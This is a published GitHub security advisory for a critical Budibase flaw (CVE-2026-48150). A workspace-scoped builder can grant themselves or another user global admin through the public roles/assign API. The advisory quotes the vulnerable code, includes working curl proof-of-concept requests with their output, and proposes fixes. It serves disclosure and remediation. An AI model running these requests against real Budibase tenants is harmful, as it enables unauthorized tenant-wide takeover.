GHSA-6XP4-CF37-PPJH

Vulnerability from github – Published: 2026-06-12 18:28 – Updated: 2026-06-12 18:28
VLAI
Summary
Budibase: Workspace-scoped builder escalates to global admin via /api/public/v1/roles/assign
Details

Summary

/api/public/v1/roles/assign is guarded by the builderOrAdmin middleware, which passes any user who is a builder for the app id in the x-budibase-app-id header. That check admits both global builders and workspace-scoped builders (builder.apps set but builder.global unset). The controller then spreads the request body into the SDK call, and the SDK grants builder.global=true or admin.global=true on whichever user ids the caller supplies. Bob, a workspace-scoped builder with an API key, promotes himself or any other user to global admin with one POST. The whole flow is tenant-wide privilege escalation from an app-level role, available to anyone with an Enterprise license that unlocks the EXPANDED_PUBLIC_API feature.

Details

Controller (packages/server/src/api/controllers/public/roles.ts:13-17):

export async function assignAppBuilder(ctx: Ctx) {
  const { userIds, ...assignmentProps } = ctx.request.body
  await sdk.publicApi.roles.assign(userIds, assignmentProps)
  ctx.body = { data: { userIds } }
}

Nothing filters assignmentProps. The request body's builder and admin keys flow directly into the SDK.

SDK (packages/pro/src/sdk/publicApi/roles.ts:17-47):

export async function assign(userIds: string[], opts: AssignmentOpts) {
  if (!(await isExpandedPublicApiEnabled())) {
    throw new Error("Unable to assign roles - license required.")
  }
  const users = await userDB.bulkGet(userIds)
  for (let user of users) {
    // ...
    if (opts.builder) {
      user.builder = { global: true }
    }
    if (opts.admin) {
      user.admin = { global: true }
    }
  }
  await userDB.bulkUpdate(users)
}

No check that the caller already holds the privilege they are granting. user.builder is overwritten unconditionally, which also strips any existing builder.apps scope from the target.

Route guard (packages/backend-core/src/middleware/builderOrAdmin.ts:6-20):

export async function builderOrAdmin(ctx: UserCtx, next: any) {
  if (ctx.internal || isAdmin(ctx.user)) { return next() }
  const workspaceId = await getWorkspaceIdFromCtx(ctx)
  if (!workspaceId && !env.isWorker()) {
    ctx.throw(403, "This request required a workspace id.")
  } else if (!workspaceId && !hasBuilderPermissions(ctx.user)) {
    ctx.throw(403, "Admin/Builder user only endpoint.")
  } else if (workspaceId && !isBuilder(ctx.user, workspaceId)) {
    ctx.throw(403, "Workspace Admin/Builder user only endpoint.")
  }
  // passes
}

isBuilder(user, workspaceId) returns true for any user whose builder.apps array contains the workspace id, even when builder.global is unset. The endpoint therefore trusts an app-level builder with a global-scope grant.

Proof of Concept

Tested on Budibase 3.35.8 (master at f960e361). The public API license gate at roles.ts:18 was disabled in the test bundle so the underlying privilege-escalation could be reproduced end-to-end; on a licensed Enterprise tenant the gate passes and the same requests land.

Step 1: the admin creates two users. Alice is a workspace-scoped builder on an app (builder.apps: [app_...], builder.global unset, admin.global unset). Victim is a BASIC user.

Step 2: Alice calls GET /api/global/self/api_key to mint an API key tied to her identity:

curl -sS -b alice "$BASE/api/global/self/api_key"
# → {"apiKey":"80f28...","userId":"us_dab...","createdAt":"..."}

Step 3: Alice calls /api/public/v1/roles/assign with the victim's id and builder: true. She scopes the request to her own app via x-budibase-app-id so builderOrAdmin passes:

curl -sS -X POST "$BASE/api/public/v1/roles/assign" \
  -H "Content-Type: application/json" \
  -H "x-budibase-api-key: $ALICE_APIKEY" \
  -H "x-budibase-app-id: $APP_ID" \
  -d '{"userIds":["us_70b6...victim"],"builder":true}'

Admin verifies:

BEFORE: builder: {'global': False} admin: {'global': False}
ATTACK: HTTP 200 {"data":{"userIds":["us_70b6..."]}}
AFTER:  builder: {'global': True}  admin: {'global': False}

Step 4: Alice follows up with "admin": true and can target her own id:

curl -sS -X POST "$BASE/api/public/v1/roles/assign" \
  -H "Content-Type: application/json" \
  -H "x-budibase-api-key: $ALICE_APIKEY" \
  -H "x-budibase-app-id: $APP_ID" \
  -d '{"userIds":["us_dab...alice"],"admin":true}'

AFTER: builder: {'apps': ['app_...']} admin: {'global': True}

Alice is now a global admin of the tenant. She kept builder.apps because the SDK only overwrites the keys it was asked to set; admin: true writes admin = { global: true } without touching builder.

Impact

Every workspace-scoped builder of any app in the tenant is one request away from global admin. Global admin grants unrestricted access to the tenant: every app in every workspace, every user, every datasource credential, every automation, every SCIM / OIDC / audit-log config. The mass-assignment also strips scoping from the target's existing role, so downgrading a legitimate global builder to an app-scoped builder fails: a later call reinstates global: true.

A tenant that shares app-building duties across teams (the common Enterprise pattern) cannot hold the per-app boundary with the current middleware. This matches GHSA-2g39-332f-68p9 (Critical Privilege Escalation & IDOR via Missing RBAC) in shape and impact.

Recommended Fix

Enforce the caller's privilege in the SDK, matching the grant they want to make:

// packages/pro/src/sdk/publicApi/roles.ts:32-43
const caller = context.getIdentity() // or however the SDK resolves the caller
if (opts.builder) {
  if (!caller?.builder?.global && !caller?.admin?.global) {
    throw new HTTPError("Only global builders or admins can grant global builder", 403)
  }
  user.builder = { global: true }
}
if (opts.admin) {
  if (!caller?.admin?.global) {
    throw new HTTPError("Only global admins can grant global admin", 403)
  }
  user.admin = { global: true }
}

Alternative, equally valid: tighten builderOrAdmin so that endpoints which can set global-scope properties require isGlobalBuilder or isAdmin. That fixes this endpoint and any future endpoint that shares the middleware.

Whichever fix lands, also strip builder and admin from assignmentProps at the controller boundary (packages/server/src/api/controllers/public/roles.ts:14) unless the caller has admin.global=true. Defense-in-depth against a future SDK regression.

Found by aisafe.io

Severity
9.0 (Critical)
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:L
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@budibase/server"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.39.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-48150"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-915"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-12T18:28:26Z",
    "nvd_published_at": "2026-05-27T18:16:27Z",
    "severity": "CRITICAL"
  },
  "details": "## Summary\n\n`/api/public/v1/roles/assign` is guarded by the `builderOrAdmin` middleware, which passes any user who is a builder for the app id in the `x-budibase-app-id` header. That check admits both global builders and workspace-scoped builders (`builder.apps` set but `builder.global` unset). The controller then spreads the request body into the SDK call, and the SDK grants `builder.global=true` or `admin.global=true` on whichever user ids the caller supplies. Bob, a workspace-scoped builder with an API key, promotes himself or any other user to global admin with one POST. The whole flow is tenant-wide privilege escalation from an app-level role, available to anyone with an Enterprise license that unlocks the `EXPANDED_PUBLIC_API` feature.\n\n## Details\n\nController (`packages/server/src/api/controllers/public/roles.ts:13-17`):\n\n```typescript\nexport async function assignAppBuilder(ctx: Ctx) {\n  const { userIds, ...assignmentProps } = ctx.request.body\n  await sdk.publicApi.roles.assign(userIds, assignmentProps)\n  ctx.body = { data: { userIds } }\n}\n```\n\nNothing filters `assignmentProps`. The request body\u0027s `builder` and `admin` keys flow directly into the SDK.\n\nSDK (`packages/pro/src/sdk/publicApi/roles.ts:17-47`):\n\n```typescript\nexport async function assign(userIds: string[], opts: AssignmentOpts) {\n  if (!(await isExpandedPublicApiEnabled())) {\n    throw new Error(\"Unable to assign roles - license required.\")\n  }\n  const users = await userDB.bulkGet(userIds)\n  for (let user of users) {\n    // ...\n    if (opts.builder) {\n      user.builder = { global: true }\n    }\n    if (opts.admin) {\n      user.admin = { global: true }\n    }\n  }\n  await userDB.bulkUpdate(users)\n}\n```\n\nNo check that the caller already holds the privilege they are granting. `user.builder` is overwritten unconditionally, which also strips any existing `builder.apps` scope from the target.\n\nRoute guard (`packages/backend-core/src/middleware/builderOrAdmin.ts:6-20`):\n\n```typescript\nexport async function builderOrAdmin(ctx: UserCtx, next: any) {\n  if (ctx.internal || isAdmin(ctx.user)) { return next() }\n  const workspaceId = await getWorkspaceIdFromCtx(ctx)\n  if (!workspaceId \u0026\u0026 !env.isWorker()) {\n    ctx.throw(403, \"This request required a workspace id.\")\n  } else if (!workspaceId \u0026\u0026 !hasBuilderPermissions(ctx.user)) {\n    ctx.throw(403, \"Admin/Builder user only endpoint.\")\n  } else if (workspaceId \u0026\u0026 !isBuilder(ctx.user, workspaceId)) {\n    ctx.throw(403, \"Workspace Admin/Builder user only endpoint.\")\n  }\n  // passes\n}\n```\n\n`isBuilder(user, workspaceId)` returns true for any user whose `builder.apps` array contains the workspace id, even when `builder.global` is unset. The endpoint therefore trusts an app-level builder with a global-scope grant.\n\n## Proof of Concept\n\nTested on Budibase 3.35.8 (master at f960e361). The public API license gate at `roles.ts:18` was disabled in the test bundle so the underlying privilege-escalation could be reproduced end-to-end; on a licensed Enterprise tenant the gate passes and the same requests land.\n\nStep 1: the admin creates two users. Alice is a workspace-scoped builder on an app (`builder.apps: [app_...]`, `builder.global` unset, `admin.global` unset). Victim is a BASIC user.\n\nStep 2: Alice calls `GET /api/global/self/api_key` to mint an API key tied to her identity:\n\n```bash\ncurl -sS -b alice \"$BASE/api/global/self/api_key\"\n# \u2192 {\"apiKey\":\"80f28...\",\"userId\":\"us_dab...\",\"createdAt\":\"...\"}\n```\n\nStep 3: Alice calls `/api/public/v1/roles/assign` with the victim\u0027s id and `builder: true`. She scopes the request to her own app via `x-budibase-app-id` so `builderOrAdmin` passes:\n\n```bash\ncurl -sS -X POST \"$BASE/api/public/v1/roles/assign\" \\\n  -H \"Content-Type: application/json\" \\\n  -H \"x-budibase-api-key: $ALICE_APIKEY\" \\\n  -H \"x-budibase-app-id: $APP_ID\" \\\n  -d \u0027{\"userIds\":[\"us_70b6...victim\"],\"builder\":true}\u0027\n```\n\nAdmin verifies:\n\n```\nBEFORE: builder: {\u0027global\u0027: False} admin: {\u0027global\u0027: False}\nATTACK: HTTP 200 {\"data\":{\"userIds\":[\"us_70b6...\"]}}\nAFTER:  builder: {\u0027global\u0027: True}  admin: {\u0027global\u0027: False}\n```\n\nStep 4: Alice follows up with `\"admin\": true` and can target her own id:\n\n```bash\ncurl -sS -X POST \"$BASE/api/public/v1/roles/assign\" \\\n  -H \"Content-Type: application/json\" \\\n  -H \"x-budibase-api-key: $ALICE_APIKEY\" \\\n  -H \"x-budibase-app-id: $APP_ID\" \\\n  -d \u0027{\"userIds\":[\"us_dab...alice\"],\"admin\":true}\u0027\n```\n\n```\nAFTER: builder: {\u0027apps\u0027: [\u0027app_...\u0027]} admin: {\u0027global\u0027: True}\n```\n\nAlice is now a global admin of the tenant. She kept `builder.apps` because the SDK only overwrites the keys it was asked to set; `admin: true` writes `admin = { global: true }` without touching `builder`.\n\n## Impact\n\nEvery workspace-scoped builder of any app in the tenant is one request away from global admin. Global admin grants unrestricted access to the tenant: every app in every workspace, every user, every datasource credential, every automation, every SCIM / OIDC / audit-log config. The mass-assignment also strips scoping from the target\u0027s existing role, so downgrading a legitimate global builder to an app-scoped builder fails: a later call reinstates `global: true`.\n\nA tenant that shares app-building duties across teams (the common Enterprise pattern) cannot hold the per-app boundary with the current middleware. This matches GHSA-2g39-332f-68p9 (Critical Privilege Escalation \u0026 IDOR via Missing RBAC) in shape and impact.\n\n## Recommended Fix\n\nEnforce the caller\u0027s privilege in the SDK, matching the grant they want to make:\n\n```typescript\n// packages/pro/src/sdk/publicApi/roles.ts:32-43\nconst caller = context.getIdentity() // or however the SDK resolves the caller\nif (opts.builder) {\n  if (!caller?.builder?.global \u0026\u0026 !caller?.admin?.global) {\n    throw new HTTPError(\"Only global builders or admins can grant global builder\", 403)\n  }\n  user.builder = { global: true }\n}\nif (opts.admin) {\n  if (!caller?.admin?.global) {\n    throw new HTTPError(\"Only global admins can grant global admin\", 403)\n  }\n  user.admin = { global: true }\n}\n```\n\nAlternative, equally valid: tighten `builderOrAdmin` so that endpoints which can set global-scope properties require `isGlobalBuilder` or `isAdmin`. That fixes this endpoint and any future endpoint that shares the middleware.\n\nWhichever fix lands, also strip `builder` and `admin` from `assignmentProps` at the controller boundary (`packages/server/src/api/controllers/public/roles.ts:14`) unless the caller has `admin.global=true`. Defense-in-depth against a future SDK regression.\n\n---\n*Found by [aisafe.io](https://aisafe.io)*",
  "id": "GHSA-6xp4-cf37-ppjh",
  "modified": "2026-06-12T18:28:26Z",
  "published": "2026-06-12T18:28:26Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Budibase/budibase/security/advisories/GHSA-6xp4-cf37-ppjh"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-48150"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Budibase/budibase"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Budibase: Workspace-scoped builder escalates to global admin via /api/public/v1/roles/assign"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.





Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Detection rules are retrieved from Rulezet.